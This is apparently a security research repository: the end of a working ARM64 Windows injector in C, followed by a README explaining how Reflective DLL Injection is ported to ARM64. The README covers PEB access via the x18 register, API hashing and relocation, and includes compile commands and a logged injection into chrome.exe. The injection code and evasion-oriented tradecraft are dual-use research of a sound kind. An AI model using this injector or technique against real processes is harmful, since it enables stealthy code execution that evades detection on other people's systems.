"ReflectiveLoader") == 0) 234 | { 235 | if (pOrdinals[i] >= pExportDir->NumberOfFunctions) 236 | { 237 | printf(" Ordinal %u for ReflectiveLoader is out of bounds (NumberOfFunctions: %lu).\n", pOrdinals[i], pExportDir->NumberOfFunctions); 238 | return 0; 239 | } 240 | if (pAddressesRva[pOrdinals[i]] == 0) 241 | { 242 | printf(" RVA for ReflectiveLoader function is null (Ordinal: %u).\n", pOrdinals[i]); 243 | return 0; 244 | } 245 | DWORD functionFileOffset = RvaToOffset_Injector(pAddressesRva[pOrdinals[i]], pNtHeaders, lpFileBuffer); 246 | if (functionFileOffset == 0 && pAddressesRva[pOrdinals[i]] != 0) 247 | { 248 | printf(" Failed to convert ReflectiveLoader function RVA (0x%lX) to offset.\n", pAddressesRva[pOrdinals[i]]); 249 | return 0; 250 | } 251 | return functionFileOffset; 252 | } 253 | } 254 | printf(" ReflectiveLoader export not found.\n"); 255 | return 0; 256 | } 257 | 258 | int main(int argc, char *argv[]) 259 | { 260 | DisplayBanner(); 261 | 262 | if (!IsHostARM64()) 263 | { 264 | printf(" Host Architecture: This injector 
is intended for ARM64 Windows.\n"); 265 | printf(" Host Architecture: Detected non-ARM64. Exiting.\n"); 266 | return 1; 267 | } 268 | else 269 | { 270 | printf(" Host Architecture: ARM64\n"); 271 | } 272 | PrintWindowsVersion(); 273 | printf("\n"); 274 | 275 | if (argc < 3) 276 | { 277 | printf(" Usage: %s \n", argv[0]); 278 | printf(" Example (PID): %s 1234 arm64_rdi.dll\n", argv[0]); 279 | printf(" Example (Name): %s Notepad.exe arm64_rdi.dll\n\n", argv[0]); 280 | return 1; 281 | } 282 | 283 | DWORD dwProcessId = 0; 284 | char *targetIdentifier = argv[1]; 285 | char *dllPath = argv[2]; 286 | BOOL isNumeric = TRUE; 287 | size_t len = strlen(targetIdentifier); 288 | 289 | for (size_t i = 0; i < len; i++) 290 | { 291 | if (!isdigit(targetIdentifier[i])) 292 | { 293 | isNumeric = FALSE; 294 | break; 295 | } 296 | } 297 | 298 | if (isNumeric) 299 | { 300 | dwProcessId = strtoul(targetIdentifier, NULL, 10); 301 | if (dwProcessId == 0) 302 | { 303 | printf(" Invalid PID '%s' provided or PID is 0.\n", targetIdentifier); 304 | return 1; 305 | } 306 | printf(" Targeting PID: %lu\n", dwProcessId); 307 | } 308 | else 309 | { 310 | printf(" Targeting process name: %s\n", targetIdentifier); 311 | dwProcessId = GetProcessIdByName(targetIdentifier); 312 | if (dwProcessId == 0) 313 | { 314 | printf(" Failed to find process '%s' or get its PID.\n", targetIdentifier); 315 | return 1; 316 | } 317 | printf(" Found PID %lu for process name '%s'\n", dwProcessId, targetIdentifier); 318 | } 319 | 320 | printf(" DLL Path: %s\n", dllPath); 321 | 322 | HANDLE hFile = CreateFileA(dllPath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 323 | if (hFile == INVALID_HANDLE_VALUE) 324 | { 325 | printf(" Failed to open DLL. Error: %lu\n", GetLastError()); 326 | return 1; 327 | } 328 | 329 | DWORD dwFileSize = GetFileSize(hFile, NULL); 330 | if (dwFileSize == INVALID_FILE_SIZE || dwFileSize == 0) 331 | { 332 | printf(" Invalid DLL size. 
Error: %lu\n", GetLastError()); 333 | CloseHandle(hFile); 334 | return 1; 335 | } 336 | printf(" DLL file size: %lu bytes\n", dwFileSize); 337 | 338 | LPVOID lpFileBuffer = HeapAlloc(GetProcessHeap(), 0, dwFileSize); 339 | if (!lpFileBuffer) 340 | { 341 | printf(" Failed to allocate buffer. Error: %lu\n", GetLastError()); 342 | CloseHandle(hFile); 343 | return 1; 344 | } 345 | 346 | DWORD dwBytesRead = 0; 347 | if (!ReadFile(hFile, lpFileBuffer, dwFileSize, &dwBytesRead, NULL) || dwBytesRead != dwFileSize) 348 | { 349 | printf(" Failed to read DLL. Error: %lu\n", GetLastError()); 350 | HeapFree(GetProcessHeap(), 0, lpFileBuffer); 351 | CloseHandle(hFile); 352 | return 1; 353 | } 354 | CloseHandle(hFile); 355 | hFile = NULL; 356 | printf(" DLL read into local buffer at: 0x%016llX\n", (unsigned long long)lpFileBuffer); 357 | 358 | DWORD dwReflectiveLoaderFileOffset = GetReflectiveLoaderOffset(lpFileBuffer); 359 | if (dwReflectiveLoaderFileOffset == 0) 360 | { 361 | HeapFree(GetProcessHeap(), 0, lpFileBuffer); 362 | return 1; 363 | } 364 | printf(" ReflectiveLoader file offset: 0x%lX\n", dwReflectiveLoaderFileOffset); 365 | 366 | HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId); 367 | if (!hProcess) 368 | { 369 | printf(" Failed to open target process. Error: %lu\n", GetLastError()); 370 | HeapFree(GetProcessHeap(), 0, lpFileBuffer); 371 | return 1; 372 | } 373 | printf(" Target process %lu opened. Handle: 0x%p\n", dwProcessId, hProcess); 374 | 375 | LPVOID lpRemoteMem = VirtualAllocEx(hProcess, NULL, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 376 | if (!lpRemoteMem) 377 | { 378 | printf(" VirtualAllocEx failed. 
Error: %lu\n", GetLastError()); 379 | CloseHandle(hProcess); 380 | HeapFree(GetProcessHeap(), 0, lpFileBuffer); 381 | return 1; 382 | } 383 | printf(" Memory allocated in target at: 0x%016llX (Size: %lu bytes)\n", (unsigned long long)lpRemoteMem, dwFileSize); 384 | 385 | if (!WriteProcessMemory(hProcess, lpRemoteMem, lpFileBuffer, dwFileSize, NULL)) 386 | { 387 | printf(" WriteProcessMemory failed. Error: %lu\n", GetLastError()); 388 | VirtualFreeEx(hProcess, lpRemoteMem, 0, MEM_RELEASE); 389 | CloseHandle(hProcess); 390 | HeapFree(GetProcessHeap(), 0, lpFileBuffer); 391 | return 1; 392 | } 393 | printf(" DLL written to target memory at: 0x%016llX\n", (unsigned long long)lpRemoteMem); 394 | 395 | HeapFree(GetProcessHeap(), 0, lpFileBuffer); 396 | lpFileBuffer = NULL; 397 | 398 | ULONG_PTR pfnRemoteLoader = (ULONG_PTR)lpRemoteMem + dwReflectiveLoaderFileOffset; 399 | printf(" Calculated remote ReflectiveLoader: 0x%016llX\n", (unsigned long long)pfnRemoteLoader); 400 | 401 | HANDLE hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pfnRemoteLoader, NULL, 0, NULL); 402 | if (!hRemoteThread) 403 | { 404 | printf(" CreateRemoteThread failed. Error: %lu\n", GetLastError()); 405 | VirtualFreeEx(hProcess, lpRemoteMem, 0, MEM_RELEASE); 406 | CloseHandle(hProcess); 407 | return 1; 408 | } 409 | printf(" Remote thread created (Handle: 0x%p). 
Waiting...\n", hRemoteThread); 410 | 411 | WaitForSingleObject(hRemoteThread, INFINITE); 412 | printf(" Remote thread completed.\n"); 413 | 414 | DWORD dwExitCode = 0; 415 | GetExitCodeThread(hRemoteThread, &dwExitCode); 416 | printf(" Remote thread exit code: 0x%08lX\n", dwExitCode); 417 | 418 | CloseHandle(hRemoteThread); 419 | CloseHandle(hProcess); 420 | 421 | printf("\n Injection process finished.\n"); 422 | return 0; 423 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Reflective DLL Injection on Windows ARM64 2 | 3 | ## Quick Summary / TL;DR 4 | 5 | This project demonstrates a functional Proof-of-Concept for Reflective DLL Injection (RDI) on Windows ARM64. Key to this is leveraging the `x18` register to access the Thread Environment Block (TEB) and subsequently the Process Environment Block (PEB), a method confirmed via WinDbg and Microsoft's ARM64 ABI documentation. The PoC, developed and tested on a Surface Pro 11 (ARM64), includes a basic injector and a reflective DLL, adapting Stephen Fewer's original RDI principles to the ARM64 architecture. This work aims to fill a gap in publicly available research for this specific technique on ARM64. 6 | 7 | ![image](https://github.com/user-attachments/assets/6cedde0f-8092-4031-bf00-020b688f4d74) 8 | 9 | 10 | ## Abstract 11 | 12 | Reflective DLL Injection (RDI) is a well-documented technique for loading Dynamic Link Libraries (DLLs) into a process's memory from a memory buffer, bypassing conventional disk-based loading mechanisms. While extensively analyzed and utilized on x86 and x64 Windows architectures, its application and detailed public documentation for the Windows on ARM64 platform have been notably limited, with very little readily accessible research specifically addressing RDI on this architecture. 
This article details the process of adapting and implementing RDI for ARM64, focusing on the architectural nuances required for self-location and API resolution by the reflective loader. We present key findings from Windows Debugger (WinDbg) analysis regarding ARM64's Thread Environment Block (TEB) and Process Environment Block (PEB) access, and demonstrate a functional proof-of-concept. The implications for offensive security practitioners and defensive strategies on the ARM64 platform are also discussed. 13 | 14 | ## 1. Introduction 15 | 16 | The Windows on ARM64 platform represents a significant and expanding segment of the computing ecosystem. As this architecture gains traction, particularly with devices like my own Surface Pro 11, the need for security researchers and practitioners to understand its low-level behavior and adapt existing tradecraft becomes increasingly critical. Reflective DLL Injection, originally popularized by [Stephen Fewer](https://github.com/stephenfewer/ReflectiveDLLInjection), offers a potent method for stealthy code execution by manually mapping a DLL within a target process's address space. This technique avoids standard Windows loader events associated with disk-based module loading, thereby evading many traditional detection methods. 17 | 18 | Despite its utility, publicly available research and tooling for RDI specifically tailored to ARM64 Windows systems are non-existent (as far as I know). While individual components or concepts may have been touched upon, a cohesive, end-to-end public demonstration and explanation of RDI on ARM64 has been elusive. This article aims to contribute to bridging this gap by detailing the necessary architectural adaptations and providing a clear methodology for achieving RDI on this platform. My approach involves leveraging WinDbg for system introspection and constructing an ARM64-specific reflective loader by adapting established RDI principles. 19 | 20 | ## 2. 
Background: Reflective DLL Injection Principles 21 | 22 | The core of RDI is the `ReflectiveLoader` function, a position-independent code segment exported by the DLL intended for injection. Once the DLL's raw image is written into the target process's memory and execution is transferred to the `ReflectiveLoader` (e.g., via `CreateRemoteThread`), it performs the following critical operations: 23 | 24 | 1. **Self-Location:** Determines its own current base address in the target process's memory. 25 | 2. **API Resolution:** Dynamically locates the addresses of essential Windows API functions (e.g., `LoadLibraryA`, `GetProcAddress`, `VirtualAlloc`, `NtFlushInstructionCache`) without relying on its own, yet unprocessed, import table. This typically involves navigating the Process Environment Block (PEB) to find loaded system modules like `kernel32.dll` and `ntdll.dll`. 26 | 3. **Memory Allocation:** Allocates a new, suitably sized memory region within the target process with execute, read, and write (RWX) permissions. 27 | 4. **PE Image Mapping:** Copies its own PE headers and sections from its initial location to the newly allocated memory region. 28 | 5. **Relocation Processing:** Applies any necessary base relocations to correct absolute addresses within its code and data sections, as the new memory region is unlikely to match the DLL's preferred image base. 29 | 6. **Import Address Table (IAT) Resolution:** Parses its own import directory, loads required dependent DLLs using the resolved `LoadLibraryA`, and populates its IAT with the addresses of imported functions obtained via the resolved `GetProcAddress`. 30 | 7. **Execution Transfer:** Calls the DLL's actual entry point (typically `DllMain`) with the `DLL_PROCESS_ATTACH` reason. 31 | 32 | The primary challenge in porting RDI to a new architecture like ARM64 lies in the API resolution phase, specifically how the TEB and PEB are accessed to enumerate loaded modules. 33 | 34 | ## 3. 
ARM64 Architectural Considerations for PEB Access 35 | 36 | On x86 and x64 architectures, the TEB is typically accessed via the `FS` and `GS` segment registers, respectively. The PEB pointer is then found at a fixed offset within the TEB. ARM64 does not utilize segment registers in this manner, necessitating a different approach for locating these critical structures. 37 | 38 | This investigation began by consulting official documentation. Microsoft's [Overview of ARM64 ABI conventions](https://learn.microsoft.com/en-us/cpp/build/arm64-windows-abi-conventions?view=msvc-170) provides crucial details regarding the architecture's register usage. Within this documentation, under the "Integer registers" section, a key piece of information is provided for the `x18` register: 39 | 40 | > `x18 N/A Reserved platform register: in kernel mode, points to KPCR for the current processor; In user mode, points to TEB` 41 | 42 | This statement directly identifies the `x18` register as the user-mode pointer to the Thread Environment Block (TEB) on ARM64. This was the architectural equivalent we were seeking to replace the FS/GS segment register mechanism. 43 | 44 | To verify this and determine the subsequent offset to the Process Environment Block (PEB), we utilized the Windows Debugger (WinDbg) attached to an ARM64 user-mode process (Notepad.exe). 45 | 46 | The `!teb` WinDbg command confirmed the presence of the TEB and its `PEB Address` field in ARM64 processes: 47 | 48 | ```text 49 | 0:026> !teb 50 | TEB at 000000347f391000 51 | ... 52 | PEB Address: 000000347f35a000 53 | ... 
54 | ``` 55 | 56 | With the TEB's base address known (obtainable programmatically via `x18`), further inspection of the TEB structure using `dt ntdll!_TEB <TEB_address>` revealed the offset of the `ProcessEnvironmentBlock` (PEB pointer) member: 57 | 58 | ```text 59 | +0x060 ProcessEnvironmentBlock : 0x00000034`7f35a000 _PEB 60 | ``` 61 | 62 | This debugging output, combined with the ABI documentation, confirmed that on ARM64, the PEB pointer can be retrieved by reading the value of the `x18` register (which gives the TEB base) and then dereferencing the memory location `TEB_BASE + 0x60`. ARM64 C/C++ compilers provide [ARM64 intrinsics](https://learn.microsoft.com/en-us/cpp/intrinsics/arm64-intrinsics?view=msvc-170) such as `__readx18qword()`, which reads a 64-bit value at a given offset from the address held in `x18`, enabling the following C code pattern within the reflective loader: 63 | 64 | ```c 65 | ULONG_PTR uiPeb; 66 | uiPeb = __readx18qword(0x60); // Reads PEB pointer from TEB_BASE (X18) + 0x60 67 | ``` 68 | 69 | ## 4. Implementing the ARM64 Reflective Loader 70 | 71 | With the PEB access mechanism for ARM64 identified as `__readx18qword(0x60)`, the construction of the `ReflectiveLoader` could proceed, adapting established RDI principles to the ARM64 architecture. The loader is designed as a position-independent function, typically exported by the DLL intended for injection. 72 | 73 | Key implementation details include: 74 | 75 | - **4.1. Self-Location and Initial API Pointer Acquisition:** 76 | The loader first determines its own base address in memory. A common technique involves calling a non-inlined function that returns the address of its caller via an intrinsic like `_ReturnAddress()`. Once its own base is known, the loader can parse its own PE headers. The critical `__readx18qword(0x60)` intrinsic is then used to retrieve the PEB address. From the PEB, the loader navigates to `PEB->Ldr->InMemoryOrderModuleList` to begin enumerating loaded system DLLs, primarily seeking `kernel32.dll` and `ntdll.dll`. 
77 | 78 | - **4.2. Hashing Algorithms for API Resolution:** 79 | To dynamically resolve API functions without relying on its own (yet unprocessed) import table, hashing is employed. Pre-calculated hash values for essential functions (`LoadLibraryA`, `GetProcAddress`, `VirtualAlloc`, `NtFlushInstructionCache`) and their respective DLLs (`kernel32.dll`, `ntdll.dll`) are stored within the loader. 80 | 81 | - _Module Name Hashing_: It was found that the hashing algorithm for module names (derived from `UNICODE_STRING.BaseDllName` in the PEB's LDR data) needed to precisely replicate the byte-wise processing and ASCII-centric uppercasing used in many original RDI implementations to match the pre-calculated `KERNEL32DLL_HASH` and `NTDLLDLL_HASH`. The `UNICODE_STRING.Length` field (in bytes) is used as the counter. 82 | 83 | ```c 84 | // Simplified excerpt of module name hashing within the ReflectiveLoader 85 | // pEntry is a PLDR_DATA_TABLE_ENTRY_LDR 86 | // dwModuleHash is the accumulator, ror_dword_loader performs bitwise rotation 87 | if (pEntry->BaseDllName.Length > 0 && pEntry->BaseDllName.Buffer != NULL) { 88 | USHORT usCounter = pEntry->BaseDllName.Length; // Length in bytes 89 | BYTE *pNameByte = (BYTE*)pEntry->BaseDllName.Buffer; 90 | 91 | do { 92 | dwModuleHash = ror_dword_loader(dwModuleHash); 93 | if (*pNameByte >= 'a' && *pNameByte <= 'z') { // Byte-level ASCII check 94 | dwModuleHash += (*pNameByte - 0x20); // Uppercase if lowercase ASCII 95 | } else { 96 | dwModuleHash += *pNameByte; // Add byte as is 97 | } 98 | pNameByte++; 99 | } while (--usCounter); 100 | // Compare dwModuleHash with KERNEL32DLL_HASH or NTDLLDLL_HASH 101 | } 102 | ``` 103 | 104 | - _Function Name Hashing_: Similarly, function names exported by `kernel32.dll` and `ntdll.dll` are iterated, hashed, and compared against target hashes. The effective algorithm for function names often involves a rotation and sum of direct character ASCII values. 
105 | 106 | ```c 107 | // Simplified excerpt of function name hashing within the ReflectiveLoader 108 | // c points to a char* function name, h is the accumulator 109 | do { 110 | h = ror_dword_loader(h); // _rotr based rotation 111 | h += *c; // Sum of ASCII character values 112 | } while (*++c); 113 | // Compare h with LOADLIBRARYA_HASH, GETPROCADDRESS_HASH, etc. 114 | ``` 115 | 116 | Once the base addresses of `kernel32.dll` and `ntdll.dll` are found, their export address tables (EATs) are parsed. The `AddressOfNames`, `AddressOfNameOrdinals`, and `AddressOfFunctions` arrays are used in conjunction with the hashing mechanism to locate the Virtual Addresses (VAs) of the required API functions. 117 | 118 | - **4.3. Memory Allocation and PE Image Mapping:** 119 | Using the dynamically resolved pointer to `VirtualAlloc`, the loader allocates a new memory region within the target process. This region is typically marked with `PAGE_EXECUTE_READWRITE` permissions and sized according to `SizeOfImage` from its own PE header. The loader then meticulously copies its own PE headers (`OptionalHeader.SizeOfHeaders`) and each section (`IMAGE_SECTION_HEADER`) from its initial, temporary location in memory to their respective virtual addresses within this newly allocated image base. 120 | 121 | - **4.4. Relocation Processing:** 122 | Since the DLL is unlikely to be loaded at its preferred `OptionalHeader.ImageBase`, base relocations must be processed. The loader calculates the delta between the new actual image base and the preferred image base. It then iterates through the relocation blocks found via the `IMAGE_DIRECTORY_ENTRY_BASERELOC` data directory. For ARM64, `IMAGE_REL_BASED_DIR64` is the predominant relocation type, requiring the 64-bit delta to be added to the value at the specified offset within the image. 
123 | 124 | ```c 125 | // Simplified excerpt of IMAGE_REL_BASED_DIR64 relocation handling 126 | // uiNewImageBase is the actual base, uiDelta is (uiNewImageBase - pOldNtHeaders->OptionalHeader.ImageBase) 127 | // pRelocBlock points to the current IMAGE_BASE_RELOCATION block 128 | // pRelocEntry points to the current IMAGE_RELOC_LDR entry 129 | if (pRelocEntry[k].type == IMAGE_REL_BASED_DIR64) { 130 | *(ULONG_PTR*)(uiNewImageBase + pRelocBlock->VirtualAddress + pRelocEntry[k].offset) += uiDelta; 131 | } 132 | ``` 133 | 134 | - **4.5. Import Address Table (IAT) Resolution:** 135 | The loader parses its own `IMAGE_DIRECTORY_ENTRY_IMPORT` data directory. For each `IMAGE_IMPORT_DESCRIPTOR`, it uses the resolved `LoadLibraryA` to load the required dependent DLL into the target process's address space. Then, for each imported function (iterating through the `OriginalFirstThunk` or `FirstThunk`), it uses the resolved `GetProcAddress` (using either the function name or ordinal) to find the function's address in the now-loaded dependent module. This address is then written into the corresponding entry in the `FirstThunk` array, effectively populating the IAT. 136 | 137 | - **4.6. Execution Transfer and Cleanup:** 138 | Before transferring execution to the DLL's actual entry point (e.g., `PayloadDllMain`), `NtFlushInstructionCache` is called. This is crucial on architectures like ARM where instruction caching might lead to stale instructions being executed after relocations or IAT patching. The call is typically `fnNtFlushInstructionCache((HANDLE)-1, NULL, 0)` to flush the cache for the current process. Finally, the DLL's entry point is called with `DLL_PROCESS_ATTACH` and any parameters passed to the `ReflectiveLoader`. 
139 | 140 | The remaining pieces of the loader, such as the internal definitions of the PEB loader structures it walks (e.g., `_PEB_LDR_DATA_LDR`, `_LDR_DATA_TABLE_ENTRY_LDR`), are essential for correct navigation and interpretation of process memory but follow established patterns adapted for 64-bit types. 141 | 142 | ## 5. Experimental Validation 143 | 144 | A proof-of-concept was developed consisting of an ARM64 injector executable and an ARM64 reflective DLL. The DLL's `PayloadDllMain` was programmed to display a `MessageBoxA` upon successful loading. The injector, enhanced with a user-friendly banner and the ability to target processes by name or PID, performed the following sequence: 145 | 146 | 1. Read the reflective DLL from disk into a memory buffer. 147 | 2. Parsed the DLL's PE structure to locate the file offset of the exported `ReflectiveLoader` function. 148 | 3. Obtained a handle to the target ARM64 process. 149 | 4. Allocated RWX memory in the target process using `VirtualAllocEx`. 150 | 5. Wrote the DLL's buffered image into the allocated remote memory using `WriteProcessMemory`. 151 | 6. Calculated the absolute address of `ReflectiveLoader` within the target process's address space. 152 | 7. Initiated execution of `ReflectiveLoader` via `CreateRemoteThread`. 153 | 154 | Successful execution was confirmed by the appearance of the MessageBoxA from the injected DLL. 
The injector output below demonstrates a successful injection into `chrome.exe` on a Windows 11 ARM64 system (Build 26200): 155 | 156 | ```text 157 | C:\Users\ah\Documents\GitHub\ReflectiveDLLInjection_ARM64>arm64_injector.exe chrome.exe arm64_rdi.dll 158 | ===================================================================== 159 | | Reflective DLL Injection on Windows ARM64 | 160 | | By @xaitax | 161 | ===================================================================== 162 | 163 | Host Architecture: ARM64 164 | Host OS: Windows 11 (Build 26200) 165 | 166 | Targeting process name: chrome.exe 167 | Found PID 20352 for process name 'chrome.exe' 168 | DLL Path: arm64_rdi.dll 169 | DLL file size: 6144 bytes 170 | DLL read into local buffer at: 0x0000024699117260 171 | ReflectiveLoader file offset: 0x538 172 | Target process 20352 opened. Handle: 0x00000000000000AC 173 | Memory allocated in target at: 0x000002BE69740000 (Size: 6144 bytes) 174 | DLL written to target memory at: 0x000002BE69740000 175 | Calculated remote ReflectiveLoader: 0x000002BE69740538 176 | Remote thread created (Handle: 0x00000000000000B0). Waiting... 177 | Remote thread completed. 178 | Remote thread exit code: 0x69750000 179 | 180 | Injection process finished. 181 | ``` 182 | 183 | The remote thread exit code (`0x69750000` in this instance) is the reflective loader's return value, i.e. the base address at which it mapped the DLL in the target process, truncated to its low 32 bits because a thread exit code is a 32-bit `DWORD`. This newly allocated image region is distinct from the raw DLL buffer that the injector wrote at `0x000002BE69740000`. 184 | 185 | ## 6. Code Availability and Compilation 186 | 187 | The proof-of-concept code demonstrating the ARM64 Reflective DLL Injection technique discussed in this article, including the injector and the reflective DLL (comprising the loader and payload), is available in this [GitHub repository](https://github.com/xaitax/ARM64-ReflectiveDLLInjection). 188 | 189 | To compile this code, an ARM64 C/C++ development environment is required. 
On Windows, this typically involves using Microsoft Visual Studio with the ARM64 build tools installed. Compilation should be performed from an "ARM64 Native Tools Command Prompt" or a development environment correctly configured for ARM64 cross-compilation. 190 | 191 | **Example Compilation Commands (using MSVC `cl.exe`):** 192 | 193 | 1. **Compile the Reflective DLL (e.g., `arm64_rdi.dll`):** 194 | The DLL must export the `ReflectiveLoader` function and link necessary libraries for its payload (e.g., `User32.lib` if `MessageBoxA` is used). The `/ENTRY` option sets the DLL's entry point to the payload's `DllMain`-style function (e.g., `PayloadDllMain`), which is what the reflective loader calls once the image has been mapped. 195 | 196 | ```batch 197 | cl /LD /Fe:arm64_rdi.dll arm64_dll.c arm64_reflective_loader.c User32.lib /link /ENTRY:PayloadDllMain /DLL 198 | ``` 199 | 200 | - `/LD`: Create a DLL. 201 | - `/Fe:filename`: Specify the output DLL name. 202 | - `User32.lib`: Example library for `MessageBoxA`. 203 | - `/link /ENTRY:functionName`: Sets the DLL's entry point. 204 | - `/DLL`: Specifies that a DLL is to be built. 205 | 206 | 2. **Compile the Injector Executable (e.g., `arm64_injector.exe`):** 207 | 208 | ```batch 209 | cl arm64_injector.c /Fe:arm64_injector.exe Kernel32.lib 210 | ``` 211 | 212 | - `Kernel32.lib`: Typically linked by default but can be specified for clarity for functions like `CreateFileA`, `OpenProcess`, etc. 213 | 214 | Users should adapt these commands based on their specific source file names and project structure. Ensure that the target architecture in the compiler and linker settings is explicitly set to ARM64. 215 | 216 | ## 7. Conclusion 217 | 218 | This research demonstrates that Reflective DLL Injection is a viable and effective technique on the Windows on ARM64 platform. By identifying the ARM64-specific mechanism for TEB/PEB access (`x18` register and `+0x60` offset) and carefully adapting hashing and PE processing logic, a functional RDI implementation was achieved. 
219 | 220 | As ARM64 Windows systems become more integrated into the computing landscape, both offensive and defensive security practitioners must adapt their tools and methodologies accordingly. While this work provides a foundational proof-of-concept, further development could incorporate more advanced features such as SEH setup and support for a wider range of PE features to create more robust and versatile ARM64 RDI solutions. 221 | 222 | ## 8. References 223 | 224 | - Microsoft Corporation. [Overview of ARM64 ABI conventions](https://learn.microsoft.com/en-us/cpp/build/arm64-windows-abi-conventions?view=msvc-170) 225 | - Microsoft Corporation. [ARM64 intrinsics](https://learn.microsoft.com/en-us/cpp/intrinsics/arm64-intrinsics?view=msvc-170) 226 | - Fewer, Stephen. [Reflective DLL Injection](https://github.com/stephenfewer/ReflectiveDLLInjection) 227 | --------------------------------------------------------------------------------